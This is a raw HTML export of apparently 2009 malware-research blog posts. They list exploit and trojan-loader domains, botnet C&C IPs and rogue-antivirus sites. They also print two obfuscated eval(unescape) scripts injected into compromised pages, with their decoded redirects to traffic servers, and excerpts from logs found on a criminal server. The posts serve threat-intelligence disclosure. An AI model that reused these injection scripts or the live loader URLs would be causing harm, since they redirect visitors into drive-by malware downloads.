<tr> <td>hxxp://yournonfatbest.cn</td> <td>Exploit to load trojan on <br />farm-en-12san.hostindianet.com/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/cc3417a8cbf0389ad12163327c8732df">VirusTotal</a> - <a href="http://wepawet.iseclab.org/view.php?hash=e89d7bf9986d2d0c646386ce37a66711&t=1238583254&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=15848c72b1c5577b4ed8e07e237c0788c" target="_blank">Anubis</a><br /><br />Detection:<br />TrojanDownloader:Win32/Bredolab.G<br /><br />Botnets: <br />213.155.4.82<br />78.109.30.224</td> </tr><tr> <td>hxxp://lotbetsite.cn</td> <td>Exploit to load trojan on <br />casinoslotbet.cn/load.php - <a href="http://wepawet.iseclab.org/view.php?hash=1c3cfb439f08852425dbc8040ecb520a&t=1238733983&type=js" target="_blank">Analysis</a><br /><a href="http://www.virustotal.com/analisis/2204575b3999d57b3bfc3e83f43fcd6e">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=120feec140b719c44296a36691cde80bf&format=html" target="_blank">Anubis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=97ba02f8183722c0bb919215ac315aa2&t=1239208603&type=js" target="_blank">Flash Exploit Analysis</a><br /><br />Detection:<br />Trojan-Downloader.Win32.Bredolab<br /><br />Botnet: <br />213.155.6.33<br /></td></tr><tr> <td> </td> <td> </td></tr><tr> <td>hxxp://hugetopnonfat.cn/in.cgi?id1000</td> <td><a href="http://jsunpack.jeek.org/dec/go?url=hugetopnonfat.cn_in.cgi_id1000" target="_blank">Javascript Analysis</a></td></tr><tr> <td>hxxp://PremiumNonfat.cn/all/<br />
</td> <td>dead</td></tr></table><hr /><br /> 94.247.3.150 [hs.3-150.zlkon.lv]<br /><br /><table width="544" border="1" cellspacing="0" cellpadding="0" bordercolor="#CCCCCC">
<tr><td height="37">hxxp://autobestwestern.cn/<br />cache/readme.pdf</td><td>Exploit to load trojan on <br />litehitscar.cn/load.php?id=5 - <a href="http://wepawet.cs.ucsb.edu/view.php?hash=8233c2b3088873d86d042ce79289e44d&t=1240167118&type=js" target="_blank">Analysis</a><br /><a href="http://www.virustotal.com/analisis/07cbfa835cf93c2f866d7e7fa18eabf5">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1cc774803b2c2ab249d677b9f5a678ead" target="_blank">Anubis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=97ba02f8183722c0bb919215ac315aa2&t=1239208603&type=js" target="_blank">Flash Exploit Analysis</a><br /><br />Detection:<br />TrojanDownloader:Win32/Bredolab.Q<br /><br />Botnet: <br />78.109.29.112<br /></td></tr><tr><td>hxxp://coolnameshop.cn/in.cgi?income</td><td> </td></tr><tr> <td>hxxp://cutlot.cn/in.cgi?income</td> <td>Botnet C&C / Exploits to <br /> hxxp:// liteautogreatest.cn/index.php<br /> <a href="http://wepawet.cs.ucsb.edu/view.php?hash=20142646ae8f7bfe737f067a3b9727b4&t=1240007105&type=js" target="_blank">Analysis</a><br /> then load trojan located<br /> hxxp://litehitscar.cn/load.php?id=5<br /> <a href="http://www.virustotal.com/analisis/ad5c23d5a7c497bb790eef37979113d5" target="_blank">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1d42a8cbbf551c5a4e9de58e48e6eb20f" target="_blank">Anubis</a><br /> <br /> Botnets: <br /> 78.109.29.112 - 78.109.30.224<a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /> </a></td></tr><tr><td width="218">hxxp://dotcomnameshop.cn</td><td width="320">Botnet C&C</td></tr><tr><td>hxxp://lotante.cn</td><td>Botnet C&C / Exploits to litehitscar.cn/index.php<br /> <a href="http://wepawet.iseclab.org/view.php?hash=0427b7627c9938608b886b095702247a&t=1239205859&type=js" target="_blank">Analysis</a><br /> then load trojan located<br /> hyperliteautoservices.cn/load.php?id=4<br /> <a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /> Botnets: <br /> 78.109.29.112 - 78.109.30.224<br /> 74.54.77.82 <br /><a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /></a></td></tr><tr><td>hxxp://lotbetworld.cn/in.cgi?income</td><td>Botnet C&C / Exploits to litehitscar.cn/index.php<br /> [94.247.3.151] <br /> <a href="http://wepawet.iseclab.org/view.php?hash=b9af869590a473fc6ba9f5ca8d498872&t=1239080318&type=js" target="_blank">Analysis</a><br /> then load trojan located<br /> hyperliteautoservices.cn/load.php?id=4<br /> <a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /> Botnets: <br /> 78.109.29.112 - 78.109.30.224<br /> 74.54.77.82 <br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /></a></td></tr><tr><td height="101">hxxp://homenameregistration.cn</td><td>Botnet C&C / Exploits to 78.41.207.196/vertu/?t=5<br /> <a href="http://wepawet.iseclab.org/view.php?hash=98f5276a9ceaaceab5f02eaba5fb201f&t=1237346408&type=js" target="_blank">Analysis</a><br /> then load trojan located<br /> 78.41.207.196<br /> <a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=100c37951c22d9a6e2b22a10f802b65c&t=1236822958">Analysis</a><a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /></a></td></tr><tr><td>hxxp://hugetopnonfat.cn</td><td>Botnet C&C</td></tr><tr><td>hxxp://dotcomnameshop.cn/<br />in.cgi?income</td><td>Botnet C&C / Redirect to exploits <br />hxxp://litehitscar.cn/index.php<br /> [94.247.3.151] <br /> <a href="http://wepawet.cs.ucsb.edu/view.php?hash=fb1733ab3508252e467bf8c222c32c8d&t=1239059244&type=js" target="_blank">Redirection Analysis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=0427b7627c9938608b886b095702247a&t=1239205859&type=js" target="_blank">Exploit analysis</a><br /> then load trojan located<br />hxxp://hyperliteautoservices.cn/load.php?id=4<br /> <a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /> Botnets: <br /> 78.109.29.112 - 78.109.30.224<br /> 74.54.77.82 <br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /></a></td></tr><tr><td>hxxp://japanhostnet.com/<br />in.cgi?income</td><td>Botnet C&C / Redirect to exploits litehitscar.cn/index.php<br /> [94.247.3.151] <br /> <a href="http://wepawet.cs.ucsb.edu/view.php?hash=fb1733ab3508252e467bf8c222c32c8d&t=1239059244&type=js" target="_blank">Redirection Analysis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=0427b7627c9938608b886b095702247a&t=1239205859&type=js" target="_blank">Exploit analysis</a><br /> then load trojan located<br /> hyperliteautoservices.cn/load.php?id=4<br /> <a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /> Botnets: <br /> 78.109.29.112 - 78.109.30.224<br /> 74.54.77.82 <br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /></a></td></tr><tr><td height="40">hxxp://internetnamestore.cn/<br />in.cgi?income18</td><td>hyperliteautoservices.cn/index.php [94.247.3.151] <a href="http://anubis.iseclab.org/?action=result&task_id=1fdf218137076cf6465f76e3f183c3174&format=html" target="_blank">Analysis</a></td></tr><tr><td height="40">hxxp://lotmachinesguide.cn/<br />in.cgi?income</td><td>Redirects to exploits<br /> hxxp://liteautogreatest.cn/cache/readme.pdf<br /> hxxp://liteautogreatest.cn/cache/flash.swf <br /> to load trojan on<br /> hxxp://liteautogreatest.cn/load.php<br /><a href="http://www.virustotal.com/analisis/6585b1eb0192e6e808c537c09c61d25d">VirusTotal</a> - <a href="http://wepawet.cs.ucsb.edu/view.php?hash=40131580bd98592c013be3d33aa926b1&t=1239959058&type=js" target="_blank">Redirection Analysis</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=19d052d8429d68d3409883523bde4b33d" target="_blank">Anubis<br /><br /></a>Botnet C&C: 78.109.29.112</td></tr><tr><td>hxxp://mainnameshop.cn</td><td>Redirect to exploits sdfi.hostindianet.com/index.php (dead)<br /> <br /> Detection: Win32/Bredolab.B<a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank"><br /></a></td></tr><tr><td>hxxp://mediahomenamemartvideo.cn</td><td>Botnet C&C down (TS v3.2)</td></tr><tr><td>hxxp://mediahousenameshopfilm.cn</td><td> </td></tr><tr><td height="192">hxxp://nameashop.cn/in.cgi?income</td><td>On 2009-03-21 01:40:07 - <a href="http://wepawet.iseclab.org/view.php?hash=880a5b789c85d8f011700474ff575f55&t=1237624807&type=js" target="_blank">Analysis</a><br /> Redirect to exploit on <br />hxxp://sadcwed.hostindianet.com/index.php<br /> On 2009-04-05 13:22:58 - <a href="http://wepawet.iseclab.org/view.php?hash=880a5b789c85d8f011700474ff575f55&t=1238962978&type=js" target="_blank">Analysis</a><br /> Redirect to exploit on <br /> freeonlinehostguide.com/index.php <br /> <a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=5802a3beabd9368daf35ad1eb4a995b3&t=1238099033">Analysis</a> - <a href="http://www.virustotal.com/analisis/65bac13aaf82cffdd84cf63bf64f0dbe" target="_blank">VirusTotal </a>- <a href="http://anubis.iseclab.org/?action=result&task_id=17a3cc78e642b0a742187d9341ae4bcec" target="_blank">Anubis</a><br /> Detection: Waledac - Kryptik.LI - Win32:Walpak Trojan.Crypt.XPACK.Gen<br /> It connect to a botnet and drop the file "digiwet.dll"<br /> Botnets: <br /> turokgame.cn [74.50.98.156]<br /> 94.247.2.95 and 78.109.30.224<br /></td></tr><tr><td height="23">hxxp://namebrandmart.cn/in.cgi<br />?income18</td><td>litehitscar.cn/load.php <a href="http://wepawet.iseclab.org/view.php?hash=e5646f3d39d6b80d9905993b75f26b52&t=1239055570&type=js" target="_blank">Analysis</a></td></tr><tr><td height="24">hxxp://namebuyline.cn</td><td> <a href="http://wepawet.iseclab.org/view.php?hash=e5646f3d39d6b80d9905993b75f26b52&t=1239055570&type=js" target="_blank">Analysis</a></td></tr><tr><td height="76">hxxp://namebuypicture.cn/<br />in.cgi?income31</td><td>Botnet C&C / redirect to exploit<br /> hyperliteautoservices.cn/index.php (dead)<br /> but the trojan is still available on<br /> hyperliteautoservices.cn/load.php <br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=a4d97828eb9521d905394f4a6d7516df&t=1239246607&type=js" target="_blank">Analysis</a></td></tr><tr><td height="24">hxxp://namesupermart.cn</td><td>Botnet C&C</td></tr><tr><td height="79">hxxp://namestorefilmlife.cn/<br /> in.cgi?income</td><td>Botnet C&C / Exploits to litehitscar.cn<br /> <a href="http://wepawet.iseclab.org/view.php?hash=75489e544a8735e0d72844529b276700&t=1239080309&type=js" target="_blank">Analysis</a><br /> then load trojan located<br /> hyperliteautoservices.cn/load.php?id=4<br /> <a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis<br /> </a></td></tr><tr><td height="93">hxxp://perfectnamestore.cn<br /> /in.cgi?income8</td><td>Redirect to exploit<br /> hyperliteautoservices.cn/index.php (dead)<br /> but the trojan is still available on<br /> hyperliteautoservices.cn/load.php <br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /> [94.247.3.151]</td></tr><tr><td>hxxp://playbetwager.cn/in.cgi?income</td><td><br /> freeonlinehostguide.com/index.php</td></tr><tr><td>hxxp://superbetfair.cn/in.cgi?income</td><td>Botnet C&C / Exploits to litehitscar.cn<br /> <a href="http://wepawet.iseclab.org/view.php?hash=75489e544a8735e0d72844529b276700&t=1239080309&type=js" target="_blank">Analysis</a><br /> then load trojan located<br /> hyperliteautoservices.cn/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=9bad5a6b522a3a1a37b6a62572a83767&t=1239297891&type=js" target="_blank">Redirection Analysis</a><br />Detection: Trojan.Botnetlog.3 <br /></td></tr><tr><td>hxxp://thelotbet.cn</td><td> </td></tr><tr><td>hxxp://yourfilmmovie.cn</td><td>Botnet C&C</td></tr></table><br /><br />hxxpp//freeonlinehostguide.com/index.php <a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=5802a3beabd9368daf35ad1eb4a995b3&t=1238099033">Analysis</a><hr /><p>Dns<br /><br />AS48856<br />VENTREX-AS Ventrex LLP</p><p>95.129.144.210</p><p>freednshostway.com<br />ns1.bigtopescorts.cn<br />ns1.casinobigtop.cn<br />ns1.casinoslotbet.cn<br />ns1.cheapslotplay.cn<br />ns1.daddybigtop.cn<br />ns1.educationbigtop.cn<br />ns1.freednshostway.com<br />ns1.freehostinternet.com<br />ns1.freeonlinehostguide.com<br />ns1.freewebhostguide.com<br />ns1.greatbethere.cn<br />ns1.hostindianet.com<br />ns1.hyperliteautoservices.cn<br />ns1.lieliteautobody.cn<br />ns1.liteautofinestsite.cn<br />ns1.liteautorepair.cn<br />ns1.litehitscar.cn<br />ns1.lotante.cn<br />ns1.lotbetsite.cn<br />ns1.playbetwager.cn</p><p>AS34187<br />RENOME-AS Renome-Service: Joint Multimedia Cable Network Odessa, Ukraine</p><p>78.26.179.79</p><p>ns2.bigtopescorts.cn<br />ns2.casinobigtop.cn<br />ns2.casinoslotbet.cn<br />ns2.cheapslotplay.cn<br />ns2.daddybigtop.cn<br />ns2.educationbigtop.cn<br />ns2.freednshostway.com<br />ns2.freehostinternet.com<br />ns2.freeonlinehostguide.com <br />ns2.freewebhostguide.com<br />ns2.greatbethere.cn<br />ns2.hostindianet.com <br />ns2.hyperliteautoservices.cn<br />ns2.lieliteautobody.cn<br />ns2.liteautofinestsite.cn <br />ns2.liteautorepair.cn<br />ns2.litehitscar.cn <br />ns2.lotante.cn <br />ns2.lotbetsite.cn<br />ns2.playbetwager.cn<br /><br /><br /></p></td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-5389667171127975373?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-17945510995376722442009-04-07T06:19:00.000-07:002009-04-09T14:31:07.836-07:00Black Hat SEO and Rogue Antivirus p.7<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO - Rogue Antivirus is BIG Business</span><br /><br /> Inside the malicious traffic<br /><br /></p><table width="510" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="510"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p> The Finjan's Malicious Code Research Center has made a nice report <br /> about the business with rogue antivirus software <br />(redirecting visitors from legitimate Web sites). <a href="http://news.cnet.com/8301-1009_3-10200104-83.html" target="_blank">Zdnet Article</a><br /><br />The article can be found in the latest <a href="http://www.finjan.com/cybercrime_intelligence" target="_blank">Cybercrime Intelligence Report</a><br /><hr />I just want to show you some script added on legit websites and the log <br />we've found on the criminal web server.<br /><br />Note that for each site on this blog like goscanfuse.com, scan6lite.com, <br />scan7new.com, every domain is listed in the Google API "Safe Browsing" <br />and each of them reveal a lot of information. <br /> eg. the number on domain used (compromised) and other in conjunctions.<br /><br /><hr /><br />We start by a Google Safe Browsing Diagnostic for: scanline6.com<br /><br /><a href="http://www.google.com/safebrowsing/diagnostic?site=http://scanline6.com/nag/1/&hl=en" target="_blank">Report here</a><br /><br /> Screenshot below (if the report is updated)<br /><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdtS5nJD5hI/AAAAAAAAAYQ/Co0qXNZG2t8/s1600-h/AS21788NOC.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdtS5nJD5hI/AAAAAAAAAYQ/Co0qXNZG2t8/s320/AS21788NOC.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321938534381381138" /></a><br /><br /> Now the Google Safe Browsing Diagnostic for three compromised websites<br /><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdtS5bmAssI/AAAAAAAAAYI/avWu9vntzLQ/s1600-h/scanline6.comSafeBrowsing.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 199px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdtS5bmAssI/AAAAAAAAAYI/avWu9vntzLQ/s320/scanline6.comSafeBrowsing.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5321938531281580738" /></a><br /><br /><br /></p><table width="280" height="48" border="1" cellpadding="0" cellspacing="0"><tr><td width="276" height="46" style="padding:15px">alfredomcmillanji.awardspace.info<br /> members.lycos.co.uk/cvhkc8xhv/</td></tr></table><br />Malicious script inserted. (after the body)<br /><br /><table width="511" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="507" height="61" style="padding:15px"><script><br />eval(unescape('\%64\%6F\%63\%75\%6D\%65\%6E\%74\%2E\%6C\<br />%6F\%63\%61\%74\%69\%6F\%6E\%3D\%22\%68\%74\%74\%70\%3A\%2F<br />\%2F\%6F\%6E\%6C\%79\%66\%69\%6E\%64\%2E\%6E\%65\%74\%2F\%69\<br />%6E\%2E\%63\%67\%69\%3F\%33\%26\%67\%72\%6F\%75\%70\%3D\%31\<br />%31\%26\%70\%61\%72\%61\%6D\%65\%74\%65\%72\%3D\%6F\%72\%74\<br />%68\%6F\%70\%65\%64\%69\%63\%2B\%70\%68\%79\%73\%69\%63\%61\<br />%6C\%2B\%65\%78\%61\%6D\%69\%6E\%61\%74\%69\%6F\%6E\%22\%3B'))<br /></script></td></tr></table><p>Which force the browser to be redirected to a traffic management server<br /></p><table width="372" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="368" height="61" style="padding:15px">document.location="http://onlyfind.net/in.cgi?3&group=11&<br />parameter=orthopedic+physical+examination";</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=6e3409b2529bbcfd9982b877495e14f2&t=1239107498&type=js" target="_blank">Result here</a><br /> then redirect to a domain (drive-by-download) which chose the next redirection<br /></p><table width="339" height="48" border="1" cellpadding="0" cellspacing="0"><tr><td width="335" height="46" style="padding:15px">onlyfind.net to "goscandata.com" to "scanany6.com"</td></tr></table><br />Note: the domain (drive-by-download) redirect to a new site every day.<br /> <br />On April 6: scanany6.com - <a href="http://wepawet.iseclab.org/view.php?hash=6e3409b2529bbcfd9982b877495e14f2&t=1239107498&type=js" target="_blank">Redirection Analysis</a><br />On April 7: scan7live.com - <a href="http://wepawet.iseclab.org/view.php?hash=6277c30fcb40c1550e3b48cc6033b661&t=1239259541&type=js" target="_blank">Redirection Analysis</a><br />On April 8: google.com <br /> On April 9: lite6scan.com - <a href="http://wepawet.iseclab.org/view.php?hash=75b212b2737a3f1567a109552ef9358a&t=1239312379&type=js" target="_blank">Redirection Analysis </a><br /><br /><hr /> </p><br />Let's show the second domain:<br /><br /><table width="202" height="48" border="1" cellpadding="0" cellspacing="0"><tr><td width="198" height="46" style="padding:15px">home.no/kjveubjh/</td></tr></table><br />Malicious script inserted. (after the body)<br /><br /><table width="490" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="486" height="61" style="padding:15px"><script language="JavaScript"><br />eval(unescape('%70%61%72%65%6E%74%<br />2E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%<br />2E%72%65%70%6C%61%63%65%28%22%68%74%74%70%3A%2F%<br />2F%64%64%6F%72%73%2E%69%6E%66%6F%2F%69%6E%2E%63%<br />67%69%3F%31%31%26%6B%65%79%77%6F%72%64%3D%67%61%<br />72%61%67%65%62%61%6E%64%2B%68%61%72%64%2B%72%6F%<br />63%6B%2B%67%75%69%74%61%72%2B%61%70%70%6C%65%2B%<br />6C%6F%6F%70%73%26%73%65%6F%72%65%66%3D%22%2B%65%<br />6E%63%6F%64%65%55%52%49%43%6F%6D%70%6F%6E%65%6E%<br />74%28%64%6F%63%75%6D%65%6E%74%2E%72%65%66%65%72%<br />72%65%72%29%2B%22%26%22%2B%22%70%61%72%61%6D%65%<br />74%65%72%3D%24%6B%65%79%77%6F%72%64%26%6B%65%79%<br />77%6F%72%64%3D%24%6B%65%79%77%6F%72%64%26%73%65%<br />3D%24%73%65%26%75%72%3D%31%26%48%54%54%50%5F%52%<br />45%46%45%52%45%52%3D%22%2B%65%6E%63%6F%64%65%55%<br />52%49%43%6F%6D%70%6F%6E%65%6E%74%28%64%6F%63%75%<br />6D%65%6E%74%2E%55%52%4C%29%29'))<br /></script></td></tr></table><p>then force the browser to be redirected to another traffic management server<br /></p><table width="409" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="405" height="61" style="padding:15px">parent.window.location.replace("http://ddors.info/in.cgi?11&keyword=<br />garageband+hard+rock+guitar+apple+loops&seoref="<br />+encodeURIComponent(document.referrer)+"&"+<br />"parameter=$keyword&keyword=$keyword&se=$se&ur=1<br />&HTTP_REFERER="+encodeURIComponent(document.URL))</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=b5e1b4dfe085fdd8dd08aaddd70cac93&t=1239112269&type=js" target="_blank">Result here</a><br /> then redirect to a domain (drive-by-download) which chose the next redirection<br /></p><table width="423" height="48" border="1" cellpadding="0" cellspacing="0"><tr><td width="419" height="46" style="padding:15px">ddors.info to "goscandata.com" to "scanany6.com"</td></tr></table><br />Note that during the redirection the "traffic management server" is informed of your IP, <br />the site which served for redirection "the compromised website".<br /><br /> Interesting is that the site serving for the first redirection is cited in <a href="http://www.malwaredomainlist.com/mdl.php?search=ddors.info" target="_blank">Malware Domain List</a> <br /> since May 2008! for hosting a zlob variant. <br /><br /> *******<br /><br /> What we've found on the server is that:<br /><br /><table width="426" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="422" height="61" style="padding:15px">1 1 0 0 0 0 0 0 US en-us 65.55.165.94 http%3A%2F%2Ftiti%2Eiax%<br />2Ebe%2Fdiagnostic%2Dteaching%2Dof%2Dreading%2Dand%2Djour<br />nal%2Darticles%2Ehtml%3Ffeed%3Dcomments%2Drss2 articles live%<br />2Ecom Mozilla%2F4%2E0+%28compatible%3B+MSIE+6%2E0%3B+<br />Windows+NT+5%2E2%3B1 1 0 0 1 1 1 0 GB en-gb 86.147.111.244<br />http%3A%2F%2Fhome%2Eno%2Fchuka%2Fwicapeadea%2Ehtml<br />wickapeadea yahoo Mozilla%2F4%2E0+%28compatible%3B+<br />MSIE+7%2E0%3B+Windows+NT+5%2E1%3B1 1 0 0 1 1 1 0 US <br />en-us 72.11.87.126 http%3A%2F%2Ftiti%2Eiax%2Ebe%2Faia%<br />2Dbilling%2Dform%2Ehtml aia+billing+form msn Mozilla%2F4%2E0<br />+%28compatible%3B+MSIE+7%2E0%3B+Windows+NT+5%2E1%3B<br /></td></tr></table><p><br /> The visitor IP (country), browser version/language and the site you are coming from which is the compromised website.<br /><br /> I will not published the entire log because a LOT of compromised web site is cited.<br /> (We also have logs from other server - in MB which include thousand of compromised website.) <br /><br /> This is some of them:<br /></p><table width="409" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="405" height="61" style="padding:15px">1 1 0 0 0 0 0 0 <br />US en-us 65.55.165.94 <br />hxxp://titi.iax.be/diagnostic-teaching-of-reading-and-journal-articles.html?feed=comments-rss2<br />Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2;) <br /><a href="http://wepawet.iseclab.org/view.php?hash=7b65f635713daef7ab6d96a4b1b5252f&t=1239112857&type=js" target="_blank">Redirection Analysis</a> <br /><br />1 1 0 0 1 1 1 0 <br />GB en-gb 86.147.111.244<br />hxxp://home.no/chuka/wicapeadea.html<br />Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)<br /><a href="http://wepawet.iseclab.org/view.php?hash=309ecbd6585d5312b71e000faff62ca0&t=1239115142&type=js" target="_blank">Redirection Analysis</a> <br /><br />1 1 0 0 1 1 1 0 <br />US en-us 72.11.87.126<br />hxxp://titi.iax.be/aia-billing-form.html<br />Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)<br /><a href="http://wepawet.iseclab.org/view.php?hash=68f7e099e33a29e4512ea455e73bfaf7&t=1239114945&type=js" target="_blank">Redirection Analysis</a><br /><br /> 4 1 1 0 0 0 0 0 <br />FR en-us 193.47.80.77<br />hxxp://mitglied.lycos.de/gbk6ntkbn/usda-maps-mn.html<br />keyword for traffic: usda maps mn<br /><a href="http://wepawet.iseclab.org/view.php?hash=c6c7901b91f89e3c7b0fce27acab32ac&t=1239114403&type=js" target="_blank">Redirection Analysis </a><br /><br /> 4 1 1 0 0 0 0 0 US <br /> en-us 204.62.53.124<br />hxxp://members.lycos.co.uk/dkd1nfkdf/voodoo-glow-skulls-guitar-tabs.html <br />keyword for traffic: voodoo glow skulls guitar tabs <br /><a href="http://wepawet.iseclab.org/view.php?hash=1b614f1201d8167c987ff2d4634276e2&t=1239114957&type=js" target="_blank">Redirection Analysis </a> <br /><br /> 4 1 0 0 0 0 0 0 IE <br /> en-us 78.137.163.133<br /> hxxp://usuarios.lycos.es/utrinopok/remove-hair-dye-stains.html <br /> keyword for traffic: remove hair dye stains <br /><a href="http://wepawet.iseclab.org/view.php?hash=c001a486d89b53856295b0ef12d59fd3&t=1239114967&type=js" target="_blank">Redirection Analysis </a> <br /><br />4 1 0 0 1 1 1 0 US <br />en-us 71.235.179.148 <br />http://members.lycos.nl/eu40wyhk/presentation-tools-for-excel-highlighting.html <br />keyword for traffic: presentation tools for excel highlighting<br /><a href="http://wepawet.iseclab.org/view.php?hash=1b614f1201d8167c987ff2d4634276e2&t=1239114957&type=js" target="_blank">Redirection Analysis </a> <br /><br /></td></tr></table></td></tr><tr><td> </td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-1794551099537672244?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-50240488283852173092009-04-04T23:02:00.000-07:002009-04-06T07:15:32.345-07:00Rogueware AntivirusPlus - thegreatsecurity.com<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="518" height="626" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr>
<td colspan="2" valign="top" height="561"><span style="font-size:14px; font-weight:bold">Rogueware AntivirusPlus - thegreatsecurity.com, todaybestscan.com</span><br /><br />Another list of malicious domain promoting rogue software associated with "AntivirusPlus"<br /><br /><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"> <tr> <td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus">THIS page</a> if you need more information<br /></td></tr></table><br /><hr /><span class="scam_website">easyincomeprotection.cn</span> (Also have 6 different template)<br /><span class="scam_website">bigdefense2u.cn</span><br /><span class="scam_website">easydefenseonline.cn</span> <br /><span class="scam_website">easyincomeprotection.cn</span> <br /><span class="scam_website">easypersonalprotection.cn</span><br /><span 